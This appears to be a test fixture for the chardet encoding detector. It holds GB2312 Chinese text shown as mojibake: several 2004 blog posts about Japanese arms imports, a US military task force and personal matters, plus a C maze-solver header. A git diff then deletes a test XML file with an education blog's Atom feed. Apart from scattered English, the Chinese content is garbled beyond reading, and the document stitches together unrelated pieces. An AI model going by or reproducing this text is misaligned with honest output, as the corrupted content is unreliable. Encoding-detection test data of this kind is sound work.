ֹֻ׀װ־הֶקµִױ‏²£¬¼ב¾צ·´¶װ´ף¹זִ£ֹ±ֹֻ׀װ־הֶקµְִ©ֹ¢£¬»‎¼«²־׃כ¹ת¼ֹח»ב½ג¾צ׃׀¹״·ְְ©ֹ¢־ּגµִֽג½»ֵ¬ֱ¦¡£ײ׀¹תׁׂ½¨ֱ¢ֶנׂ»ױּ׳÷­¸ַ÷ֻ¡¢ֹת¡¢»¯÷ֽµ¼µ¯µָ¸קְאֳפ¸׀־ןֿמ÷ֽ¼¼ץµִ³צ¿¿״ײֶ·¨¹זּוֿµ£¬ײ׀¹תµִ·ְְ©ֹ¢³צ¿¿״ײֶ׃כ¹ת¼ֽ¨׀׀׳צ·¨»ש±¾ׂ»ײֲ¡£°׳ֶ₪יֻµ£¬µ±ַ°ֶֽ¶¯¹ת¼¾¿״׃כ²ֳ¾½ר³ּµִ¹״¼£¬ַ´עֶֶָױִֽ²ֳ¾ּ¸ֵ׀»בׂיµִ½©¾ײ¡£ײ׀¹תײ§³ײ²ֳּ¸»ב¾¡¿ל¾ֽ÷ֻ²ֳ¾¡¢¡°½ײ¹ֹת²ת÷ֻ־הֶק׃ֱֳׁ±ה²ֱִּֿץװ¼¡±ּ¸ֵ׀¡¢־÷ֻ־הֶק¹ת¼ׂ°²ָ«±£ײ₪¡¢·ְײ¹ֽג¿ױ¾±¸¾÷ִָֻ´ףׂיּג¿×ױ¹µײ׀װ¹₪׳ק¡£ - ¡¡¡¡°׳ֶ₪יײ¸³צ£¬ײ׀¹תׂ»¹בײקױֵָ«ֳז½ײ¹÷ֽ³¹µ׳ֿת»÷ֻ־הֶק¡£ײ׀¹ת¼ײױ·מ׀׀²»׳ָֿ¹׃ֳ÷ֻ־הֶקµִױ‏²£¬³׀ֵµ־ּץ¼‏µ״²»¶װ־÷ֻ־הֶק¹ת¼ׂ÷ֽ־÷ֻ־הֶקַר¹׃ֳ»עֽ‏׀²¹׃ֳ÷ֻ־הֶק¡£ײ׀¹ת¹‎ָ¥ֳ»׃׀¡¢½«ְ´ׂ²²»»ב׃כָ־÷־¹ת¼ׂ½ר׀׀÷ֻ¾±¸¾÷ָ¡£°׳ֶ₪יֻµ£¬µ±ַ°׀־ֲֶֿ£¬¶װ־÷ֻ־הֶק¹ת¼ּׂב¹©°²ָ«±£ײ₪־ּגµִײ״ׂ×׀װ÷ֽ½פֶָ׀װ¸ַקֽ»³צ£¬ײ׀¹תײ§³ײ¾ֽ¸ֳ־ּגּ¸ֵ׀µ½בׂ»ֿמ¹ת¼·¨ֲֹ־ִי¡£ײ׀¹תַ־ו¸צ÷ֻ־הֶק¹ת¼ׂײ׀־¨ׂ»³׀ֵµ־ּץ¼‏µ״²»¶װ־÷ֻ־הֶק¹ת¼ׂ»ע־÷ֻ־הֶקַר¹׃ֳ»עֽ‏׀²¹׃ֳ÷ֻ־הֶקµִ¹ת¼ׂ¡£ײ׀¹ת÷פ׃ץֶהִֻֻ¸צ÷ֻ־הֶק¹ת¼ׂ׳צ³צֽ¬ׁש±£ײ₪¡£ - ¡¡¡¡°׳ֶ₪י»¹ֿך¾¡½יֱֹֻײ׀¹תֲִ׀׀¹ת¼¾¿״׃כ²ֳ¾ׂו־ס¡¢²־׃כ¾¿״ֱל׃עµִָֻµְײקׂוֵ¬ֱ¦µִַי¿צ¡£ - ÷ֽ±נµִ¹ת¼ׂ¾ַֽ²»ׂ»ׁש°ֹ¡£ - - - http://bbs.blogsome.com/2004/12/27/odhuciaeodhuuauaaeee/ - - - ָױ04ִך³ֹ־×ְֳָ«ַע׃׀³¥¾ֲװ®ײתµ¶‏´ף־הֶק½ר¿¹ת - ֳָֻסֽר±±¾©2004ִך12װֲ27ָױµחְֳ¹ת¹ת·ְ°²ָ«±£ױֿ÷ֿ׳ק¾ײµִֽ³¼ֶ‎¾ֿװ¾£¬2004ִךָױ±¾ׁׂ¾­³ֹ־×ְֳ¹תָ«ַע׃׀³¥¾ֲװ®ײת(FMS)µִµ¶‏´ף־הֶק½ר¿¹ת£¬¸־»ֱ׀ַׁײµׂ»¡£ - ¡¡¡¡2004ִך¶ָ£¬ְֳ¹ת²»¶ֶֽֿ½רװַׁײµִ»שµ״µקױ£¬¶װ÷«¹ת÷ּֽ¨ֽוµִ־הֶק³צ¿ֽ¬±ֿא¶װ¼ץֹ£¬¶ר¶װָױ±¾µִ־הֶק³צ¿ָ´ֿא¶װװצ³₪¡£¡¡¡¡ - ¡¡¡¡¾ֽ³¼ֶ£¬2004ִך¶ָ£¬ָױ±¾´׃ְֳ¹ת½׃µִ־הֶק½»»ץ׳¶מ´ןµ½13ְֳׂװ×£¬¶ר÷ֽֿ¬¶מׂ²´ןµ½ֱֻ8ְֳׂװ×£¬ֻ«ֻ«װ¾¾׃ַׁײµׂ»¡£½»»ץ¶מ½צ´־׃ֿ£ְ°־»ֱ׀ָ«ַעµ¶‏£¬÷ֽֿ¬¶מ½צ´־׃²¨ְ¼÷ֽ°£¼°ֱ׀ָ«ַעµָ‎¡£ - ¡¡¡¡FMSײקׂ×ׂװ¾׃ֳ·ֹ»ת¡¢µ¼µ¯µָ²»ִֽ¨¹‎ֹּׂµֽ¾¾¶½ר׀׀ֲעֲפµִ±£ֳ׀װִ½ֿ¸µִ׳°±¸־×½»ׂ׳¶װֿף¡£ָױ±¾ײקׂ×½ר¿װחֶװ₪¾¯»ת÷ֽ·ְ¿ױµ¼µ¯µָײ״ׂ×׳°±¸¡£1996¡«1999ִך£¬ָױ±¾µִ׳½ר¿ֱ¿ׂ»ײ±־»¾׃ַׁײµָ‎£¬´׃2000ִךײֱ½ס£¬ׂ»ײ±־ָ¾׃ַׁײµ¶‏£¬½סִךµׂ»´־װ¾¾׃ַׁײµׂ»¡£ - »¹ֻµ²ֳ´ײ׀ָױ׃ְ²»װױ½£¬»ֶףְַ¸ר¼¦°ִךֳ»°²÷ֳ׀ִ¡£ - - - http://bbs.blogsome.com/2004/12/27/eo04aeeiaaecoodhyueaoouuuthoiaaeouu/ - - - ְֳײ₪µ5ִךַ°³ֱֹ¢519²¿¶׃ׂע׃¦ַּׁ«±ה»¯°ְ¨ּ¨÷£ - ¡¡ײ׀¹תּ¨ֽוֽר12װֲ27ָױֿֿ¢¾¸ֳ½±¨µְ£¬ְֳ¾ּ«ֶ½ׁף½¢¶׃ֻ¾ֱמ²¿·¢ׁװֲָֻףµ±ְֽ£¨MarkMcDonald£©ײ₪µ£¬¡°519ֱ×÷ּֿ״ַ²²¿¶׃¡±£¨JTF¡×519£©ׁׂ³ֱֹ¢¶אִך£¬ַ־×ׂע׃¦ַּׁ«ױ¸צַר׃עµִ±ה»¯£¬ּ¨÷£־£»תׂ²°ְ¨װִ¡£ - ¡¡¡¡´ַֻ°£¬ָױ±¾NHKµח׃ּ¨װר±¨µְ³ֶ£¬ְֳ¾ׁׂװּ«ֶ½ׁףְֳ¾²¿¶׃ִ²¿±א׳יׂ»ײ§ׂװ÷£¾׃כ¿ױ¾־×ײקֱ¦µִ¡°519ֱ×÷ּֿ״ַ²²¿¶׃¡±£¬ׂװ׃¦¸¶ּ¨÷£־£»ת¡£ -ָױֳ½ֲֶָֿ״¹ג - ¡¡¡¡ָױֳ½NHK¸ש¾ְֳ¹ת־ו½ַ´ףֲ¥µִֿֿ¢ֻµ£¬ױגײ§ֳ־ס°519ֱ×÷ּֿ״ַ²²¿¶׃¡±£¨JointTaskForce519£©µִ²¿¶׃ֱ¥פ÷£¾ּ«ֶ½ׁף½¢¶׃ֻ¾ֱמ¶אְ¼ײ®ֲֿ£¬²¿נֱֻ÷£¾¡¢¿ױ¾³צֹםµִ׳¨ֳֵֻ¾ֱמ²¿ׂ×װ±´ףװ¼400ָֻ¡£¸ש¾ְֳ¹ת÷£¾µִ׳ֱֿ£¬ְֳ¹תַװ1999ִךµ׳־×ֱֻװַּׁ«¾±¸¸ַ¿µִ׃¦±הֱִ¦£¬ֳָµ±±µִּ«ֶ½ׁף½¢¶׃ֻ¾ֱמ·¨¸ך³ֹ־ס°519ֱ×÷ּֿ״ַ²²¿¶׃¡±µִֻ¾ֱמ¡£ - ¡¡¡¡ְֳ·½ׂ»ֿע¶װ׃ַּׁ«µ״ַרµִ°²ָ«־ָ¶¨±£³ײ¸¶ָµִ¹״׳¢£¬ְֳ¾¹‎ָ¥³₪±¼הװַּׁ«µ״ַר¼ײױ־¬³ײ10ֽעָֻׂװֹֿµִ±רֱ¦£¬¶װ׃¿ִֹ³צֿײµִ¾ײֶׁ±ה£¬׃¦׃׀ֿא¹״µִׂע׃¦´כ©¡£ - ¡¡¡¡ְֳ·¢ׁװָֻײ₪µ - ¡¡¡¡ְֳ¾ּ«ֶ½ׁף½¢¶׃ֻ¾ֱמ²¿·¢ׁװֲָֻףµ±ְֽ23ָױֿעֳ½ּו±ם¾£¬ױג¸צֱ×÷ּֿ״ַ²²¿¶׃µִָ־־סַׂע׃¦ױ¸צµ״ַרµִ±ה»¯£¬°ְ¨ָֻµְ¾ָװ®¡¢÷£ִׁ¾ָװ®÷ֽײקׂ×µִ¾ֲ³וֽ»£¬ּ¨÷£¾ֲ־£»תׂ²ֶַהײ׀ׂ»ֿמ¡£ֻ±ם¾²»ֱֻ½גNHKµִ¾ּו±¨µְִָ£¬µ«³ֶ¡°ױג¾ר²»ַ׀ֲµִ·¢ױ¹¡±¡£ - ¡¡¡¡¸ש¾ְֳ¹ת÷£¾ִ²¿¿¯־ןµִ±¨µְ£¬JTF¡×519³ֱֹ¢÷ף£¬װר׃2002ִך10װֲװְֳ¹תµֶ½¢¶׃ֶל½¢¡°ְ¶ֱכ÷ֵ¡±¾׀׀׳´־»ת¶¯ֿׁ°£¬JTF¡×519¸ר׃טּ«ֶ½ׁףײ¸»׃²¿ֽךױµִ»ת¶¯²¿נֱִ¦£¬´׃¼ֶ»®µ½ײ´׀׀£¬´׃·ַױ½¶·׀װָֻװ±טֹ¢µ½ײקׂ×µִַר׃ע¾ֲ³וֽ»¡£ - ¡¡¡¡ְֳ¹ת÷£¾±ם¾£¬׃ֹ׃ַּׁ«µ״ַר¹ת¼ֿׂא¼ּ·¢ױ¹²ס׃ַֽ±ֽ§²¿¶׃£¬׀ם¶א¹ת¼ׂ¸ָ¡µֳװ¶³ּµ¯µְµ¼µ¯£¬ֻשׂװ519ֱ×÷ּֿ״ַ²²¿¶׃ׂ×ֳז¶װױג׀©ֽ‏׀²£¬ָ·±£ָ־־ס³ֹ¹¦׃כ׀ֵµְ־׳ט¡£ - ¡¡¡¡ָֻװ±׳י³ֹ¶ְּ״ - ¡¡¡¡JTF¡×519ַׂ»ײ§ִ¹ז»®׃כײ´׀׀ָ־÷־½פ¼±ָ־־סµֱִ×÷ָֿ־־ס±א׳י£¬´׃ֿא¶װ׀¡¹זִ£µִָ־־ס£¨ָח·ַױ½¶·׀װ³·ֻֽ»ע÷£ֹֿ·גֻר£©µ½´ף׀ֽױ½ַר³וֽ»µָ¡£ױגײ§ּ״ַ²²¿¶׃µִ¶ְּ״ײ®´¦װֶהָֻװ±µִ׳יׁµ·½½¡£ֻ²¢־´ׂװִ³¸צ׳²¿־×÷ֻ׀ִ£¬ֿא·´µ״£¬ֶהָֻװ±ֹ¢²¼׃ָ«ְֳ¸קµ״£¬¶«ײֱֲםְןְ¼ײµֳִµֲ±₪£¬׳מ±±¿ֹײֱ°¢ְ­ֻ¹¼׃¡£JTF¡×519ָֻװ±±אײֶ¿״ײֶװ400ָֻ£¬ַׂ×ֵה÷ֿײ¸»׃½¢ֹֿµִ´²־»ֿײֶ£¬²»µ«¾׃׀³ה·ײµִ»ת¶¯׀װ£¬¶רַׂׂ²ִװּ«ֶ½ׁףָ־÷־µ״ַר¶ְֱ¢׳קׂµ¡£ - ¡¡¡¡ױ½ֱ¦»ע½«ױ÷ֿ - ¡¡¡¡ְֳ¹ת÷£¾ּ«ֶ½ׁף½¢¶׃ֿעְ´׃ֲ׃ַף±ה£¬´׃20ְ¼ֽ³ץµִװ­ַּׁ«·ײַ²¶׃³ֹ³₪־×¶‏´־´ףױ½ֶ¼הִבֳ׳׳ָֹֿ½«ֻשֱלµ¼µִ¾«ָס¾¢ֲֳ¡£1958ִך£¬ּ«ֶ½ׁף½¢¶׃µִ½ַֹ«׳×׀ֽ־×ׂװ÷£¾־×ײקֱ¦µִ±רֱ¦ײ¸»׃׃כ¹©׃¦ײ׀׀ִ¡£ְהױ½÷ף£¬ֻµִײקׂ×ײ°װנַ־×÷£¾²¹³ה±רװ´¡¢ּב¹©ׁµֱ·׃כ׳°±¸£¬ָחְֳ¹ת¶װ°¢¸»÷¹׃כְֱׂ­¿ֻµִ¾ֲ׀׀¶¯¡£ - ¡¡¡¡JTF¡×519װ¶ִֶּ½«׃כּ«ֶ½ׁף½¢¶׃¡°ֱ×÷ֿ²¿¶׃ײ¸»׃²¿¡±׀ֲ³ֱֹ¢µִ¡°³£ֹטֱ×÷ֿ²¿¶׃׳²¿¡±ײ¸¹µ¥־»½ר׀׀ױ½ֱ¦ױ÷ֿ£¬÷ףױµִ÷ֻ׀ִ־×ׂ»ָ÷¹‎ּ״ׁµµִ·ײ־צ¼ׂ׃כ׳קױ½¹ז»®ָֻװ±¡£¸ֳµ¥־»½«ּבֹ‎׳קױ½¹ז»®ֱִ¦£¬¶רְֳֳַָׂ¾ּ«ײ¸²¿׃כJTF¡×519¶¼ִװ׃¦¸¶ַר׃ע־£»ת±£¬׃כֽג²¿»ת¹¹½ר׀׀¸³ה·ײµִ׀­µק¡£ - ְֳ¹תְׁױזַ²ֳ´¶¼¹£¬־ֳַׂ׳װ¼÷¼ׂµֲִֻ¶¼ׂײף÷ֽ£¬µָ׃׀³¯ׂ»ָױ־ֳַׂׂ²¸רְֻ´¸צ÷ֶֽ½ׁ±ה£¬ֻ¢µִ¾ֽ³ֱַֹֻ°ֻױֱ×¶‏´ת¡£ - - - http://bbs.blogsome.com/2004/12/27/aaoeu5aeceac519oooonciauai/ - - - »³ִמֳ«ׂ¯ׂ¯ - ½סּלֳַ«ׂ¯ׂ¯µִµ®³½¼ִֽמָױ£¬ֹמֹמֳו»³ - - - http://bbs.blogsome.com/2004/12/27/aiaoo/ - - - ´ף÷£׀¥£¬־ׂײ»ִֶםµ»ֱֻ - ־ֿׂכ´ף¼ׂ¶¼¿´ֱֻ°ֹ£¬¶«ִַֿׁ´ף÷£׀¥£¬ְֱֻֻֽע°ֱָֻֻׁ£¬ֹץײֱֱ¬ְמֱ¬½¶¼§׳ֱֻ£¬ֽ¦¿ײ²ְµִ£¬־ׂ»¹׃׀¸צֽ¬ׁ§ׂ²װִַ£¬ױזֿ£ֻֽ‎ֳ»ֲ¡£ -־×ִַ׀©²»׀ׂµֳִֶַָֻםµ»°ֹ¡£ - - - -12װֲ26ָױ£¬װֻ¹ְןְ¼¿¨׳¶¼¿ֲֶ׳ֲֶ£¬ׂ»ֳִ׀׳׃װּ®ֻתµִ·¿־ְֽשײ׀ֻׁׁ°־ןֶ·¡£ - - - - http://bbs.blogsome.com/2004/12/27/odhyiooauaeiuae/ - - - ׂ»¸צ‎¾½ב¹¹ֳװ¹¬־ּג - ױגַֽרֹֿׂ»¸צ¸ָֻ׀´µִ -===================================================== -maze.h -===================================================== -#ifndef MAZE_H -#define MAZE_H -#include -#include - #define MAX_MAZE_SIZE 100 -#define MAX_STACK_SIZE 500 - extern int Number; - typedef enum{ -Wall, -Space, -Thinked -}TMazeElem; - typedef struct{/*׳ר±ך*/ -int x,y; -}Coordinate; - /*׃ֳׂ»¸צ‎׳יְ´±ם¾ֳװ¹¬*/ -typedef struct { -int iLength,iHeight;/*ֳװ¹¬µִ³₪¶ָ÷ֽ¿ם¶ָ*/ -TMazeElem pMaze[MAX_MAZE_SIZE][MAX_MAZE_SIZE]; -Coordinate in,out;/*ֳװ¹¬µִָכ¿÷ֽ³צ¿*/ -}TMaze; - typedef struct{/*¶¨ׂוֳװ¹¬½גµֲִ·¾¶ֹֿµִװ×ֻ״*/ -Coordinate pos;/*µ±ַ°־»ײֳ*/ -int di;/*ֲֿׂ»¸צ׃¦¸ֳּ½ֻקµִ·½ֿע*/ -}PathElem; - /*¶¨ׂוװֳװ¹¬ֹֿµִ²׳ק*/ - void PrintMaze(TMaze *maze); -/*ה³צֳװ¹¬µ½ֱִֶ»*/ - bool LoadMaze(TMaze *maze,char *fname,char *errMsg); -/*´׃־ִ¼‏ײ׀הָכֳװ¹¬*/ - bool SaveMaze(TMaze *maze,char *fname); -/*±£´זµ½־ִ¼‏fnameֳװ¹¬*/ - void ClearMaze(TMaze *); -/*ַו¿ױֳװ¹¬*/ - void FindMazePath_R(TMaze *maze,Coordinate cur,char *fname); -/*²יױֳׂװ¹¬µִ½ג£¬²¢ַׂ°ֳׁװ¹¬µִ½׃׀´ָכ־ִ¼‏fname,curµ±ַ°־»ײֳ -*׃ֳµ¹יµֿײ -*ֳ»׃׀µקװ׀ֵֿ¢ -*/ - void FindMazePath_RD(TMaze *maze,Coordinate cur,char *fname,FILE *d); -/*²יױֳׂװ¹¬µִ½ג£¬²¢ַׂ°ֳׁװ¹¬µִ½׃׀´ָכ־ִ¼‏fname -*׃ֳµ¹יµֿײ -*´רµקװ׀ֵֿ¢,µקװ׀ֵֿ¢±»׀´ָכ־ִ¼‏d£¬ֽ¨¹‎¸ֳ־ִ¼‏ִד¿ֹׂװֱֻ½ג³ּ׀עַװץׁשּ½ֻקֳװ¹¬µִ -*/ - void FindMazePath_B(TMaze *maze,char *fname); -/*׃ֳ»״ֻ·¨ּ½ֻקֳװ¹¬µִֻש׃׀½ג£¬²¢ַׂ°ׁ½ג׀´ָכ־ִ¼‏ֳ־×fname µִ־ִ¼‏ -* -*׃ֳ»״ֻ·¨ּ½ֻקֳװ¹¬µִ½ג÷ֽ׃ֳ¶ׁױ»µ¼ַֹֿׂ»ײֲµִ£¬װױגְןֳ»׃׀׃ֳ¶ׁױ»ַׂע־×£÷ -*ָח¹׃ֳ¶ׁױ»µִ»°׃׀ׂ×װצ¼׃ׂ»¸צֽ·־ִ¼‏ְ´µֿײ¶ׁױ»µִ»ש±¾²׳ק£¬־ִ¼‏װ½¶א¾ֽװ½²» -*±ד׃µקװ£¬ׂע´ֻװױגְן־ׂ׃ֱֳֻׂ»¸צ‎׳יְ´´תּז¶ׁױ»£¬µ«ַµ¼ֹֿ¶¼ׂ»ׁש -* -*²»ה³צµקװ׀ֵֿ¢£¬²»ה³צֳװ¹¬µִּ½ֻק¹‎³ּ -*/ - void FindMazePath_BD(TMaze *maze,char *fname,char *dname); -/*׃ֳ»״ֻ·¨ּ½ֻקֳװ¹¬µִֻש׃׀½ג£¬²¢ַׂ°ׁ½ג׀´ָכ־ִ¼‏ֳ־×fname µִ־ִ¼‏ -* -*׃ֳ»״ֻ·¨ּ½ֻקֳװ¹¬µִ½ג÷ֽ׃ֳ¶ׁױ»µ¼ַֹֿׂ»ײֲµִ£¬װױגְןֳ»׃׀׃ֳ¶ׁױ»ַׂע־×£÷ -*ָח¹׃ֳ¶ׁױ»µִ»°׃׀ׂ×װצ¼׃ׂ»¸צֽ·־ִ¼‏ְ´µֿײ¶ׁױ»µִ»ש±¾²׳ק£¬־ִ¼‏װ½¶א¾ֽװ½²» -*±ד׃µקװ£¬ׂע´ֻװױגְן־ׂ׃ֱֳֻׂ»¸צ‎׳יְ´´תּז¶ׁױ»£¬µ«ַµ¼ֹֿ¶¼ׂ»ׁש -* -*´רµקװ׀ֵֿ¢,µקװ׀ֵֿ¢±»׀´ָכ־ִ¼‏dname£¬ֽ¨¹‎¸ֳ־ִ¼‏ִד¿ֹׂװֱֻ½ג³ּ׀עַױגׁשּ½ֻקֳװ¹¬µִ -*/ - #endif -====================================================== -maze.c -====================================================== -#include -#include -#include -#include - void ClearMaze(TMaze ... - http://bbs.blogsome.com/2004/12/26/ooeyyaaoieia/ - - - °ב¼ֱֻׂ - ײױ׃¾צ¶¨°ׁ±נµִblogֹֿµִִָ°דµ½ױג¸צ׀ֲ¼ְׂ´ - - - http://bbs.blogsome.com/2004/12/26/aoae/ - - - diff --git a/chardet/tests/GB2312/blog.online-edu.org.xml b/chardet/tests/GB2312/blog.online-edu.org.xml deleted file mode 100644 index 89c7989..0000000 --- a/chardet/tests/GB2312/blog.online-edu.org.xml +++ /dev/null @@ -1,171 +0,0 @@ - - - - - - -Going Global (´ףֵס³µ) -http://blog.online-edu.org/minjuan/ - - -Link to----±±ְֳֹת»מ±׳±³× £¨־ִׁ§׳קֶ·ֹת»מ¹ֲ£©¡£µ«ײ״µד´׃´ֻ׳×ֶׂµ½ױג¸צ¸ׁ§ץµִ²©¿ֽ¡£¼׃ײֹת»מֿא²ב||| ֹֿ÷£½»´ףֽרײ¾£÷װ¶·½ ]]> -en-us - -2005-11-19T16:31:31-05:00 - - - - - - - - - - - - - - - - - - - - - - - - - - -ֲפ¸ר¹«ֻ¾µִֽע½נ׃ֽ -http://blog.online-edu.org/minjuan/#005788 -ױ×׳װ£÷http://learningcircuits.blogspot.com/ We are the Problem: We¡¯re Selling Snake Oil--¼¸¸צLearning Professionals µִ¸ז°׳¡£ Sam began with 4 simple, but powerful statements: ¡₪ Training does not work. ¡₪ eLearning does not work. ¡₪ Blending Learning does not work. ¡₪ Knowledge Management does not work. ױ¸צ½ּ׃‎¼¼ץֱל׃ע¶¼ֳזֱּפױ½£»ׂע־׸ֳ·¢ֿײµִ¶¼·¢ֿײֱֻ£¬£ֲֿµִ¾ַֽ¸ת׳ֵ¿ֶ¼¼ֵ£¬blog, wiki, mobile learning,podcasting...ֻש׃׀ײ׀ֹֿ²ת½׳²ד²ֵ»בָָײװµִ¶«־ק¡£׳צ¹«ֻ¾ֵאׁµµֳִַָֻ³£³£»»ְּ²»»»ׂ©£¬²»¶ֶֽֿ³צ׀ֲִ£½°ׁ׳װ¼÷°׳°³ֹ׳¨¼ׂ¡£ִ¿ַ°־ׂ׳מ׃׀׀ָֻ₪µִַײ׀¹תֵ©´וµִ׀¡ׁ§½ּ׃‎¡£־×Corporate America ׳¬ַ®¸ת־ׂµִָֹֻתְםִמֿא±³¡£Educational Technologists ׃¦µ±ׂװֳָֹת»מׁ§ֿ°÷ֽ±נָֻ¸ְֳ÷ֳ־×ִ¿±ך£¬¶ר²»ֲַפ׳ל÷ֲֽפֽע½נ׃ֽ¡£... - -minjuan -2005-11-19T16:31:31-05:00 - - -Blog ׁ׀¾¿¿־ּג -http://blog.online-edu.org/minjuan/#005787 -ׂ»¸צ÷׃׀ֻ¼ֿכµִׁ§ֹתLoretװׁ׀¾¿¹«ֻ¾¶װֽרײ¾µִ׃¦׃ֳ¡£ְֳ¹ת¹«ֻ¾ְן²»¶ֿ׃׀ָֻׂע־×׀´ֽרײ¾±»¿×³‎£»װֵ·ײָֻ¿´ְ´£¬ְֳ¹תֳ»׃׀²ֳ´ׁװֲ׳װ׃ֹ¡£־ֳַׂװ־ֲ¸ח»×µִ»בׂיֻׁµָ«³¡±¬ֲת£¡ֻהָ»¿ֶ¼¼·¢ױ¹÷¿ל£¬ֳַָֻ¶װ²©¿ֻµִַָָי²»¼ץ¡£±ֿ¾¹£¬²©¿ֻײֱ½ס¹ֳַָֻ±ם´ן׳װ¼÷µִ׳מ÷ֳ·½½¡£ֻש׃׀׃¦ָֻ׀װµִ¹₪¾ׂ»¶¨»ב·ֹֿט¡£ֻ‎ױ‎װ¿´µִֽרײ¾£÷ the support one from Articulate (http://blog.articulate.com/wom/) and the CEO one from SUN (http://blogs.sun.com/roller/page/jonathan). Other alternatives could be from Learning Circuits, Cisco, Google, Quickbooks, or HP: - http://learningcircuits.blogspot.com/- http://www.cisco.com/web/about/gov/blog/index.html- http://googleblog.blogspot.com/ - http://quickbooks_online_blog.typepad.com/blogmain/- http://h71028.www7.hp.com/enterprise/cache/104417-0-0-0-121.aspx... - -minjuan -2005-11-19T16:19:10-05:00 - - -21st ְ¼ֽµִׁ§ֹת -http://blog.online-edu.org/minjuan/#005762 -DON'T BE LEFT IN THE E-DUST £¨²»ׂ×±»ֲֵׂהװµח׳׃»ׂ³¾ײ׀£© "He sits at the computer with headphones piping music from an iPOD to his ears. Ten different MSN chat windows blink and chime on the computer screen. An online role-playing game is minimized on the Windows taskbar. A music video blares from a... - -minjuan -2005-11-12T15:47:10-05:00 - - -ֳֵָָ»°ּג£÷podcasting -http://blog.online-edu.org/minjuan/#005752 -http://edweb.sdsu.edu/courses/edtec700/pod/ ־ֳַֿׂµ¸ױ¿×µִׂ»ֳֵ¿־£¬׳¨ֳֵ¿´Podcastingµִ·½·½ֳזֳז¡£ ֿא¹״׳ֱֿ£÷http://edweb.sdsu.edu/courses/edtec700/pod/podquest.htm Middle East Geography & Travel Mr. Mayo.org - Podcast #6 Online Literature Websites ACPS: This Day in History Is Fluoride Good for Us? Smart Solutions Episode 2 ¨C First Impressions Podcast Design Elements £¨ֹט¼ֶµִ·½·½ֳזֳז£©... - -minjuan -2005-11-11T20:37:09-05:00 - - -What Makes a Good Teacher -http://blog.online-edu.org/minjuan/#005652 -÷ְֳֿ¦µִ®´ףּ״ױק£÷ 1. Good Teachers Really Want to Be Good Teachers 2. Good Teachers Take Risks 4. Good Teachers Never Have Enough Time 7. Good Teachers Try to Keep Students-And Themselves-Off Balance 9. Good Teachers Do Not Trust Student Evaluations "I have learned that when I am comfortable, complacent, and sure... - -minjuan -2005-10-02T23:50:32-05:00 - - -Educate Net Generation -http://blog.online-edu.org/minjuan/#005634 -ׂ»±¾÷׃׀ֶפ·¢µִי£¬ֻש׃׀½ּ׃‎ױµִ±״¶ֱ£¡±¾י¶װְֳ¹תµִ3´תָֻ׳צֱֻֿךֿ¸±ָ½ֿ£÷Baby boomer (1946-1964); Generation X (1965-1982); Net Generation (1982-1994) ֶהײ׀µִGeneration X ׳מ׃׀¾«ֹס׳·ַףׂ²ָׂ׳¹‎·ײ¹״׳¢ִ׀ִ£¬ֿאµ±׃ײ׀¹ת70ִך´תµִָֻ£¬ ¶א³מֶֹ¸׀¡£ http://www.educause.edu/ir/library/pdf/pub7101.pdf "The Net Generation has grown up with information technology. The aptitudes, attitudes, expectations, and learning styles of Net Gen students reflect the environment in which they were raised -- one that is decidedly different from that... - -minjuan -2005-09-19T14:11:13-05:00 - - -The Learner's Search for Meaning -http://blog.online-edu.org/minjuan/#005625 ---from Chief Learning Officer װ¡¶¡´ְָֻא¶װׂגׂוµִׁ°ױׂ¡µ¡·ׂ»יײ׀£¬Dr. Victor Frankel ֳטצְֱָֻֻאֻש±״׀טµִ־¬³ײֹת´ז÷ֽ»מ¶¯µֱִ¦ֱ¿¡£¶‏ױ½±µִ¼¯ײ׀׃×ְן£¬»מְֲֿ´µִִַַ׀©´׃ֹח»ב£¬¼ֽׂ¥£¬»עױ׀ֵׁצײ׀ױׂµ½ֱֹֻת´זׂגׂוµִָֻ¡£ ׁ§ֿ°ׂ²ַׂ»ׁשµִ£¬ָֿׂ×ֱֻ½גׁ§ֹת£¨»עֵאׁµָֻװ±£©µִ¸צִָֻ¿±ך÷ֽׁ§ֿ°ִ¿±ך£¬ ¿־³ּµִֹט¼ֶׂ×װֽ¼°ֱׁ½ױֿא½ב÷ֿ¡£¡°To help others find the intersection of personal and organizational meaning that advances the interests of customers, shareholders, and employers."... - -minjuan -2005-09-13T14:49:49-05:00 - - -²׃ְֳµִ´ף׳װָ» -http://blog.online-edu.org/minjuan/#005615 -ָ¥±±±µִTorre Pines Beach, ַָֿ¿´µ½ֲתּלµִ·ִֹס£¬װׂ»ֶ¬÷‏±£¬ֳַָֻֿ¼¯÷ֿ£¬װ ·ֹֹ¢£¬װ¼¯÷ֿ£¬·ֲ·נװ¾ׁµ£¬׳¼±¸ׂ»³¡ִסְא´ףױ½¡£ ¶ר÷ף¿´µ½²׃ְֳµֲִהָױ¡£¿´÷££¬´¥ֳ‏ֲהׁפ£¬¶װ׳ֵּ«ׁפµִ־ט£¬ּ«ׁפ־ט¡£ִַׂ»¿ּ£¬ְ½חֻץ ׀¡ֱֻ£¬ײ»׃׀־ׂ£¬ּ«ֶ½ׁף£¬ּ«ׁפ£¬÷ִֵֽ´ע׳ֵ³א½ֵµִ÷£ֻ®¡£ ֱלֲװֱֻ׳װָ»µִ¹ג»װ£¬²ֵ׃׀÷ֳ׀ִַי¿×¼ױגׂ»ײµִ¹₪׳ק£»µָ´‎ֲֿׂ»´־¸תֲהָױײ״·ך¡£ http://gingermoon.multiply.com/photos/album/11... - -minjuan -2005-09-06T12:40:19-05:00 - - -¹״׃½ּ׃‎ׁ׀¾¿÷ְֶֽ¹ְµִֽרֲ·׳װ´ -http://blog.online-edu.org/minjuan/#005603 -http://edweb.sdsu.edu/courses/ed690sp05/TipsEvaluationBC1.htm ־ׂ׳װ¼÷µִױ¼¯£»÷ׁ§ֹתֳַ»¶׃­¡£ױגִךֽ·£¬ֻ­»¹ָ¥ֽ¼י¹ִ״£¿ֽרֹֿµִ¶«־ק£¬ָ¡ײ®²»¾¡£¬׃ֳײ®²»ֽך¡£... - -minjuan -2005-09-04T02:36:17-05:00 - - -װ¶³ּ½ּׁ§ׁ׀¾¿·½·¨ -http://blog.online-edu.org/minjuan/#005602 -Ten Efficient Research Strategies For Distance Learning Source: Online Journal of Distance Learning Administration Today's distance education administrator, frequently with an expertise in another academic discipline, is also supposed to be a distance education scholar. http://www.distance-educator.com/dnews/Article11772.phtml... - -minjuan -2005-09-04T02:10:44-05:00 - - -¶ְ³ֹׂ»ּוµִ Internet Research -http://blog.online-edu.org/minjuan/#005601 -Internet Research Tracings: Towards Non-Reductionist Methodology Internet research has become a "field" in its own right in the social sciences, already boasting a number of peer-reviewed journals, a plethora of book titles, and an international association that draws hundreds of researchers from across the globe to its annual conference. Full... - 